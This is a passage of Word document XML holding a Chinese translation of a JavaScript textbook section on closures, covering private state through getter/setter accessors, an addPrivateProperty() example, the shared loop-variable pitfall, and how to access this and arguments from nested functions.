        <w:t>count()</w:t>
      </w:r>
      <w:r>
        <w:t>返回下一个整数，</w:t>
      </w:r>
      <w:r>
        <w:t>reset()</w:t>
      </w:r>
      <w:r>
        <w:t>将计数器重置为内部状态。首先要理解，这两个方法都可以访问私有变量</w:t>
      </w:r>
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>。再者，每次调用</w:t>
      </w:r>
      <w:r>
        <w:t>counter()</w:t>
      </w:r>
      <w:r>
        <w:t>都会创建一个新的作用域链和一个新的私有变量。</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>因</w:t>
      </w:r>
      <w:r>
        <w:t>此，如果调用</w:t>
      </w:r>
      <w:r>
        <w:t>counter()</w:t>
      </w:r>
      <w:r>
        <w:t>两次，则会得到两个计数器对象，而且彼此包含不同的私有变量，调用其中一个计数器对象的</w:t>
      </w:r>
      <w:r>
        <w:t>count()</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>reset()</w:t>
      </w:r>
      <w:r>
        <w:t>不会影响到另外一个对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>从技术角度看，其实可以将这个闭包合并为属性存取器方法</w:t>
      </w:r>
      <w:r>
        <w:t>getter</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>setter</w:t>
      </w:r>
      <w:r>
        <w:t>。下面这段代码所示的</w:t>
      </w:r>
      <w:r>
        <w:t>counter()</w:t>
      </w:r>
      <w:r>
        <w:t>函数的版本是</w:t>
      </w:r>
      <w:r>
        <w:t>6.6</w:t>
      </w:r>
      <w:r>
        <w:t>节中代码的变种，所不同的是，这里私有状态的实现是利用了闭包，而不是利用普通的对象属性来实现：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function counter(n){//</w:t>
      </w:r>
      <w:r>
        <w:t>函数参数</w:t>
      </w:r>
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>是一个私有变量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return{//</w:t>
      </w:r>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
      <w:r>
        <w:t>getter</w:t>
      </w:r>
      <w:r>
        <w:t>方法返回并给私有计数器</w:t>
      </w:r>
      <w:r>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:t>递增</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>get count(){return n++;},//</w:t>
      </w:r>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
      <w:r>
        <w:t>setter</w:t>
      </w:r>
      <w:r>
        <w:t>不允许</w:t>
      </w:r>
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>递减</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>set count(m){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(m</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>=n)n=m;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else throw Error("count can only be set to a larger value");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var c=counter(1000);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.count//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>1000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.count//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>1001</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.count=2000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.count//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>2000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.count=2000//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>Error!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>需要注意的是，这个版本的</w:t>
      </w:r>
      <w:r>
        <w:t>counter()</w:t>
      </w:r>
      <w:r>
        <w:t>函数并未声明局部变量，而只是使用参数</w:t>
      </w:r>
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>来保存私有状态，属性存取器方法可以访问</w:t>
      </w:r>
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>。这样的话，调用</w:t>
      </w:r>
      <w:r>
        <w:t>counter()</w:t>
      </w:r>
      <w:r>
        <w:t>的函数就可以指定私有变量的初始值了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>8-4</w:t>
      </w:r>
      <w:r>
        <w:t>是这种使用闭包技术来共享的私有状态的通用做法。这个例子定义了</w:t>
      </w:r>
      <w:r>
        <w:t>addPrivateProperty()</w:t>
      </w:r>
      <w:r>
        <w:t>函数，这个函数定义了一个私有变量，以及两个嵌套的函数用来获取和设置这个私有变量的值。它将这些嵌套函数添加为所指定对象的方法：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>8-4</w:t>
      </w:r>
      <w:r>
        <w:t>：利用闭包实现的私有属性存取器</w:t>
      </w:r>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这个函数给对象</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>增加了属性存取器方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>方法名称为</w:t>
      </w:r>
      <w:r>
        <w:t>get</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>＞和</w:t>
      </w:r>
      <w:r>
        <w:t>set</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>＞。如果提供了一个判定函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//setter</w:t>
      </w:r>
      <w:r>
        <w:t>方法就会用它来检测参数的合法性，然后在存储它</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>如果判定函数返回</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>setter</w:t>
      </w:r>
      <w:r>
        <w:t>方法抛出一个异常</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这个函数有一个非同寻常之处，就是</w:t>
      </w:r>
      <w:r>
        <w:t>getter</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>setter</w:t>
      </w:r>
      <w:r>
        <w:t>函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>所操作的属性值并没有存储在对象</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>相反，这个值仅仅是保存在函数中的局部变量中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//getter</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>setter</w:t>
      </w:r>
      <w:r>
        <w:t>方法同样是局部函数，因此可以访问这个局部变量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>也就是说，对于两个</w:t>
      </w:r>
      <w:r>
        <w:t>存取器方法来说这个变量是私有的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>没有办法绕过存取器方法来设置或修改这个值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function addPrivateProperty(o,name,predicate){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var value;//</w:t>
      </w:r>
      <w:r>
        <w:t>这是一个属性值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//getter</w:t>
      </w:r>
      <w:r>
        <w:t>方法简单地将其返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>o["get"+name]=function(){return value;};//setter</w:t>
      </w:r>
      <w:r>
        <w:t>方法首先检查值是否合法，若不合法就抛出异常</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>否则就将其存储起来</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>o["set"+name]=function(v){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(predicate</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>!predicate(v))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>throw Error("set"+name+":invalid value"+v);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>value=v;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>下面的代码展示了</w:t>
      </w:r>
      <w:r>
        <w:t>addPrivateProperty()</w:t>
      </w:r>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var o={};//</w:t>
      </w:r>
      <w:r>
        <w:t>设置一个空对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>增加属性存取器方法</w:t>
      </w:r>
      <w:r>
        <w:t>getName()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>setName()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>确保只允许字符串值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>addPrivateProperty(o,"Name",function(x){return typeof x=="string";});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>o.setName("Frank");//</w:t>
      </w:r>
      <w:r>
        <w:t>设置属性值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>console.log(o.getName());//</w:t>
      </w:r>
      <w:r>
        <w:t>得到属性值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>o.setName(0);//</w:t>
      </w:r>
      <w:r>
        <w:t>试图设置一个错误类型的值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>我们已经给出了很多例子，在同一个作用域链中定义两个闭包，这两个闭包共享同样的私有变量或变量。这是一种非常重要的技术，但还是要特别小心那些不希望共享的变量往往不经意间共享给了其他的闭包，了解这一点也很重要。看一下下面这段代码：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这个函数返回一个总是返回</w:t>
      </w:r>
      <w:r>
        <w:t>v</w:t>
      </w:r>
      <w:r>
        <w:t>的函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">function constfunc(v){return </w:t>
      </w:r>
      <w:r>
        <w:t>function(){return v;};}//</w:t>
      </w:r>
      <w:r>
        <w:t>创建一个数组用来存储常数函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var funcs=[];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var i=0;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>10;i++)funcs[i]=constfunc(i);//</w:t>
      </w:r>
      <w:r>
        <w:t>在第</w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>个位置的元素所表示的函数返回值为</w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>funcs[5]()//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这段代码利用循环创建了很多个闭包，当写类似这种代码的时候往往会犯一个错误：那就是试图将循环代码移入定义这个闭包的函数之内，看一下这段代码：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>返回一个函数组成的数组，它们的返回值是</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>9</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function constfuncs(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var funcs=[];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var i=0;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>10;i++)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>funcs[i]=function(){return i;};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return funcs;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var funcs=constfuncs();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>funcs[5]()//</w:t>
      </w:r>
      <w:r>
        <w:t>返回值是什么</w:t>
      </w:r>
      <w:r>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>上面这段代码创建了</w:t>
      </w:r>
      <w:r>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:t>个闭包，并将它们存储到一个数组中。这些闭包都是在同一个函数调用中定义的，因此它们可以共享变量</w:t>
      </w:r>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:t>。当</w:t>
      </w:r>
      <w:r>
        <w:t>constfuncs()</w:t>
      </w:r>
      <w:r>
        <w:t>返回时，变量</w:t>
      </w:r>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:t>的值是</w:t>
      </w:r>
      <w:r>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:t>，所有的闭包都共享这一个值，因此，数组中的函数的返回值都是同一个值，这不是我们想要的结</w:t>
      </w:r>
      <w:r>
        <w:t>果。关联到闭包的作用域链都是</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>活动的</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>，记住这一点非常重要。嵌套的函数不会将作用域内的私有成员复制一份，也不会对所绑定的变量生成静态快照（</w:t>
      </w:r>
      <w:r>
        <w:t>static snapshot</w:t>
      </w:r>
      <w:r>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>书写闭包的时候还需注意一件事情，</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的关键字，而不是变量。正如之前讨论的，每个函数调用都包含一个</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>值，如果闭包在外部函数里是无法访问</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[13]</w:t>
      </w:r>
      <w:r>
        <w:t>，除非外部函数将</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>转存为一个变量：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var self=this;//</w:t>
      </w:r>
      <w:r>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>保存至一个变量中，以便嵌套的函数能够访问它</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>绑定</w:t>
      </w:r>
      <w:r>
        <w:t>arguments</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>问题与之类似。</w:t>
      </w:r>
      <w:r>
        <w:t>arguments</w:t>
      </w:r>
      <w:r>
        <w:t>并不是一个关键字，但在调用每个函数时都会自动声明它，由于闭包具有自己所绑定的</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>arguments</w:t>
      </w:r>
      <w:r>
        <w:t>，因此闭包内无法直接访问外部函数的参数数组，除非外部函数将参数数组保存到另外一个变量中：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var outerArguments=arguments;//</w:t>
      </w:r>
      <w:r>
        <w:t>保存起来以便嵌套的函数能使用它</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
